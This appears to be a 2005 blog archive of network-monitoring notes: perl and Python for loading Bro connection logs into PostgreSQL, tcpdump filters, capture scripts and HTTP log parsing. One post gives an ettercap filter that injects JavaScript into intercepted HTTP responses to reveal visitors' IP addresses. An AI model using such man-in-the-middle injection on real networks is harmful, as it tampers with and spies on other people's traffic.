Archive for August, 2005

Parsing Bro’s connection logs and writing it into a database

Wednesday, August 17th, 2005
  1. Create a database table with the following fields:
    • sip (source address)
    • sport (source port)
    • dip (destination address)
    • dport (destination port)
    • sbytes (bytes sent by the originator)
    • rbytes (bytes sent by the responder)
    • length (connection duration)

create table conn(sip inet, sport int, dip inet, dport int, sbytes int, rbytes int, length float);

  2. Use a perl one-liner that turns every conn.log line into an INSERT (the '"'"' sequence is the shell trick for getting a single quote out of a single-quoted argument; the indices map conn.log columns to the table: $a[2]/$a[3] are the hosts, $a[5]/$a[6] the ports, $a[8]/$a[9] the byte counts and $a[1] the duration):

perl -ne '@a = split; print "INSERT INTO conn VALUES('"'"'$a[2]'"'"', $a[5], '"'"'$a[3]'"'"', $a[6], $a[8], $a[9], $a[1]);\n";'

BTW, Bro writes ? for values it does not know (duration and byte counts of unfinished connections), and those need to be replaced with NULL before the INSERT is valid; do it with =~ s///.

  3. Combine all of them into a horrible thing (psql test test is database "test", user "test"):

cat conn.log | perl -ne '@a = split; $a[8] =~ s/\?/NULL/; $a[9] =~ s/\?/NULL/; $a[1] =~ s/\?/NULL/; print "INSERT INTO conn VALUES('"'"'$a[2]'"'"', $a[5], '"'"'$a[3]'"'"', $a[6], $a[8], $a[9], $a[1]);\n";' | psql test test -h 127.0.0.1
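The same load without splicing log fields into SQL text, as an added example that is not from the original post: a small Python parser for the conn.log column layout implied by the one-liner's indices, which maps ? to NULL, rejects host fields that are not IP addresses, and hands the rows to a DB-API cursor as parameters. The sample log lines are constructed, and the load() helper assumes a psycopg2-style connection; nothing else on this page defines that API.

```python
# Added example (not from the original post). Parses old-style Bro conn.log lines
# and feeds them to a parameterized INSERT instead of splicing fields into SQL text.
# Column layout assumed from the indices used in the post's one-liner:
#   0 start  1 duration  2 orig_h  3 resp_h  4 service  5 orig_p  6 resp_p
#   7 proto  8 orig_bytes  9 resp_bytes  (state, flags, ... follow)
import ipaddress

# Constructed sample; "?" is how Bro marks an unknown value.
SAMPLE_LOG = """\
1124270000.123456 0.532 192.0.2.10 198.51.100.7 http 34511 80 tcp 412 8731 SF X
1124270001.000000 ? 192.0.2.10 198.51.100.53 dns 51234 53 udp ? ? S0 X
1124270002.500000 12.1 203.0.113.9 192.0.2.10 ssh 40022 22 tcp 2048 4096 SF X
"""

# Column names match the post's table; %s placeholders are DB-API (psycopg2) style.
INSERT_SQL = ("INSERT INTO conn (sip, sport, dip, dport, sbytes, rbytes, length) "
              "VALUES (%s, %s, %s, %s, %s, %s, %s)")


def _opt(value, conv):
    """Map Bro's '?' to None (SQL NULL); otherwise convert with conv."""
    return None if value == "?" else conv(value)


def parse_conn_line(line):
    """One conn.log line -> (sip, sport, dip, dport, sbytes, rbytes, length).

    Raises ValueError on a short line or a non-IP host field, so garbage in a
    damaged log stops the load instead of reaching the database.
    """
    f = line.split()
    if len(f) < 10:
        raise ValueError("short conn.log line: %r" % line)
    sip = str(ipaddress.ip_address(f[2]))
    dip = str(ipaddress.ip_address(f[3]))
    return (sip, _opt(f[5], int), dip, _opt(f[6], int),
            _opt(f[8], int), _opt(f[9], int), _opt(f[1], float))


def parse_conn_log(text):
    """All non-empty, non-comment lines of a conn.log as parameter tuples."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(parse_conn_line(line))
    return rows


def load(conn, text):
    """Insert rows through a DB-API connection (assumed: psycopg2.connect(...)).

    The driver sends the values separately from the statement, so a field can
    never alter the SQL; executemany also avoids one round trip per line.
    """
    rows = parse_conn_log(text)
    cur = conn.cursor()
    cur.executemany(INSERT_SQL, rows)
    conn.commit()
    return len(rows)


if __name__ == "__main__":
    for row in parse_conn_log(SAMPLE_LOG):
        print(row)
```

For a one-off bulk load, psql's \copy from a tab-separated file with NULL set to ? does the same job with no script at all; the parser above is for the case where you want validation or a different target.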

Printing a single quote in a shell script

Wednesday, August 17th, 2005

Diego's "shell nasty quoting tricks": to get a single quote into a single-quoted argument, close the single quotes, put the quote inside double quotes, and reopen: '"'"' (the shell joins the three adjacent strings into one argument).

Or in more detail: perl -e 'print " a' " ' " 'b " ' prints the string  a ' b  (spaces included); the shell sees three adjacent strings, 'print " a', " ' " and 'b " ', and concatenates them into one perl program.

Backticks deprecated

Wednesday, August 17th, 2005

Yes they are: backticks (`cmd`) are better replaced with $(cmd), which nests cleanly. The problem is that not all shells know about it ;-)

Matching all outgoing (and only outgoing) traffic with tcpdump

Tuesday, August 16th, 2005

Task: match all outgoing traffic (not including local services, e.g. 80, 22, 25). Actually, not as simple as it could have been. Moreover, contrary to the manpage, my tcpdump does not seem to support "portrange". Hopefully one can do something like this: tcp[0:2] for the source port and tcp[2:2] for the destination port.

In the end the rule is as follows:

tcpdump -n -i eth0 "(udp and ( ((dst host $MYIP) and (udp[2:2] >= 1024)) or ((src host $MYIP) and (udp[0:2] >= 1024)) )) or (tcp and ( ((dst host $MYIP) and (tcp[2:2] >= 1024)) or ((src host $MYIP) and (tcp[0:2] >= 1024)) ) and (not port (9030||9001)))"

The >= 1024 test is a heuristic: a packet counts as outgoing when the port on $MYIP's side is unprivileged, so inbound connections to high ports on $MYIP match too. Note also that the not port clause is inside the tcp branch only, and that tcp[...]/udp[...] tests are evaluated on the first fragment of a datagram only, since later fragments carry no transport header.
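What tcp[0:2] and tcp[2:2] actually select, as an added example that is not from the original post: a Python rendering of the rule above run on constructed IPv4/TCP and IPv4/UDP packets. It counts offsets from the transport header the way libpcap does (after the variable-length IP header, and only on the first fragment), which is also why a fixed offset into the frame would break on packets carrying IP options. MYIP, the packets and the port numbers are all constructed for the demo.

```python
# Added example (not from the original post): the offset tests behind the tcpdump
# rule above, evaluated in Python on constructed packets. tcp[0:2]/udp[0:2] is the
# source port and tcp[2:2]/udp[2:2] the destination port, counted from the start
# of the transport header, i.e. after the IP header of IHL*4 bytes.
import socket
import struct

MYIP = "192.0.2.10"                 # stands in for $MYIP (constructed)
EXCLUDED_TCP_PORTS = {9001, 9030}   # the rule's "not port (9030||9001)" clause
IPPROTO_TCP, IPPROTO_UDP = 6, 17


def build_ipv4(src, dst, proto, payload, options=b"", frag_offset=0):
    """Minimal IPv4 header (no checksum) with a correct IHL; options lengthen it."""
    assert len(options) % 4 == 0
    ihl = 5 + len(options) // 4
    total = 20 + len(options) + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, total, 0,
                      frag_offset & 0x1FFF, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + options + payload


def build_tcp(sport, dport):
    """20-byte TCP SYN header with no payload; only the ports matter here."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 65535, 0, 0)


def build_udp(sport, dport):
    """8-byte UDP header with no payload."""
    return struct.pack("!HHHH", sport, dport, 8, 0)


def matches_outgoing(pkt):
    """True if the post's filter would capture this IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    frag_offset = struct.unpack("!H", pkt[6:8])[0] & 0x1FFF
    src = socket.inet_ntoa(pkt[12:16])
    dst = socket.inet_ntoa(pkt[16:20])
    if proto not in (IPPROTO_TCP, IPPROTO_UDP):
        return False
    # libpcap evaluates tcp[...]/udp[...] on the first fragment only; later
    # fragments carry no transport header, so they never match.
    if frag_offset != 0:
        return False
    sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])   # tcp[0:2], tcp[2:2]
    # "outgoing" heuristic: the port on MYIP's side is unprivileged (>= 1024)
    ours_is_ephemeral = (dst == MYIP and dport >= 1024) or (src == MYIP and sport >= 1024)
    if proto == IPPROTO_UDP:
        return ours_is_ephemeral
    return (ours_is_ephemeral
            and sport not in EXCLUDED_TCP_PORTS
            and dport not in EXCLUDED_TCP_PORTS)


if __name__ == "__main__":
    cases = {
        "outgoing http": build_ipv4(MYIP, "198.51.100.7", IPPROTO_TCP, build_tcp(40000, 80)),
        "its reply": build_ipv4("198.51.100.7", MYIP, IPPROTO_TCP, build_tcp(80, 40000)),
        "inbound ssh": build_ipv4("203.0.113.9", MYIP, IPPROTO_TCP, build_tcp(40022, 22)),
        "tor port": build_ipv4(MYIP, "203.0.113.1", IPPROTO_TCP, build_tcp(45000, 9001)),
        "with ip options": build_ipv4(MYIP, "198.51.100.7", IPPROTO_TCP,
                                      build_tcp(40001, 443), options=b"\x01\x01\x01\x01"),
    }
    for name, pkt in cases.items():
        print("%-16s %s" % (name, matches_outgoing(pkt)))
```

The "inbound ssh" case shows the rule's intent (a connection to a local service on a low port is left out), and "its reply" shows that both directions of an outgoing connection are kept, as the dst host branch of the rule requires.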

Large files with Bro/Snort/…

Monday, August 15th, 2005

To overcome this limit (2 GB per capture file when the tools are built without large-file support) one needs to recompile with large-file support: 1. libpcap, 2. snort/bro/... itself.

Hope it works – haven’t tried it yet.

http://www.tcpdump.org/lists/workers/2003/11/msg00047.html
http://archives.neohapsis.com/archives/snort/2002-02/0395.html

Capturing local traffic for further analysis (long term)

Monday, August 15th, 2005

Add this line to a script in cron.daily/cron.hourly/... (tcpdump does not exit by itself, so every cron run starts another capture: kill the previous instance first or bound the run with -c <packets>; if the command goes into a crontab entry rather than a script, escape the % signs in the date format as \%; and keep an eye on disk space, since -s 0 saves whole packets):

tcpdump -np -i eth0 -s 0 -w /<path>/$(date +"%Y%m%d-%H%M%S").tcpdump "<filter>"

Injecting JavaScript with ettercap

Monday, August 15th, 2005

This should inject JavaScript that reports the visitor's local IP address (it relies on LiveConnect, i.e. using java.net classes from JavaScript, which only works in Netscape/Mozilla-era browsers with the Java plugin installed; the alert shows the address the client's own socket was bound to):

if (ip.proto == TCP && tcp.src == 80) {
    replace("</BODY>", "<script>s1 = \"error\";s2 = \"error\";try { so = new java.net.Socket(); so.bind(new java.net.InetSocketAddress(\"0.0.0.0\",0)); so.connect(new java.net.InetSocketAddress(document.domain,80)); s1 = so.getLocalAddress().getHostAddress(); s2 = so.getLocalAddress().getHostName(); so.close(); } catch (e) { document.writeln(e); } alert(\"Client's IP: \"+ s1 + \"(\"+s2+\")\"); </script></BODY>");
}

replace() looks for a literal substring, so spell the closing tag the way the server emits it (a lowercase </body> needs its own rule), and the response has to arrive uncompressed for the tag to be visible in the stream. You need to compile this filter with etterfilter and load it with "ettercap -F <filter.ef>" together with the usual MITM options.

Haven’t tried it but it should work.

Parsing HTTP records (one-liner)

Monday, August 15th, 2005

Extracting triples (host, referrer, GET target) from HTTP request data; a record is printed on every line consisting of just ".", the record separator of whatever produced the input. The captures need a * to take the whole token, and the variables are cleared after each record so a request without a Referer does not reprint the previous one:

perl -ne '$get = $1 if /^GET (\S+) /; $host = $1 if /^Host: (\S+)/; $ref = $1 if /^Referer: (\S+)/; if (/^\.$/) { print "ID, $host, $get, $ref\n"; $host = $get = $ref = ""; }'
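The same extraction in Python, as an added example that is not from the original post: it walks "."-terminated records, matches the header names case-insensitively, tolerates CRLF line endings, and returns None for a missing Host or Referer rather than the previous record's value. The request data below is constructed.

```python
# Added example (not from the original post): (host, GET target, referrer) per
# HTTP request, with per-record state reset. Records end with a line that is a
# single ".", as the one-liner above expects.
import re

# Constructed input: three requests; the second has no Referer, the third is a POST.
SAMPLE = """\
GET /index.html HTTP/1.1
Host: www.example.com
Referer: http://search.example.net/?q=x
.
GET /logo.png HTTP/1.1
Host: www.example.com
.
POST /login HTTP/1.1
Host: www.example.com
Referer: http://www.example.com/index.html
.
"""

# Header names are case-insensitive in HTTP, so match them that way.
_GET = re.compile(r"^GET (\S+) ")
_HOST = re.compile(r"^Host:\s*(\S+)", re.IGNORECASE)
_REF = re.compile(r"^Referer:\s*(\S+)", re.IGNORECASE)


def http_triples(text):
    """Return one (host, target, referrer) tuple per GET record; missing -> None."""
    triples = []
    host = get = ref = None
    for raw in text.splitlines():
        line = raw.rstrip("\r")             # tolerate CRLF-terminated header lines
        if line == ".":                     # record separator
            if get is not None:             # skip records without a GET line
                triples.append((host, get, ref))
            host = get = ref = None         # reset so nothing leaks into the next record
            continue
        m = _GET.match(line)
        if m:
            get = m.group(1)
            continue
        m = _HOST.match(line)
        if m:
            host = m.group(1)
            continue
        m = _REF.match(line)
        if m:
            ref = m.group(1)
    return triples


if __name__ == "__main__":
    for host, target, referrer in http_triples(SAMPLE):
        print("ID, %s, %s, %s" % (host, target, referrer))
```

Unlike the one-liner, records without a GET line (the POST above) are dropped instead of being printed with stale values.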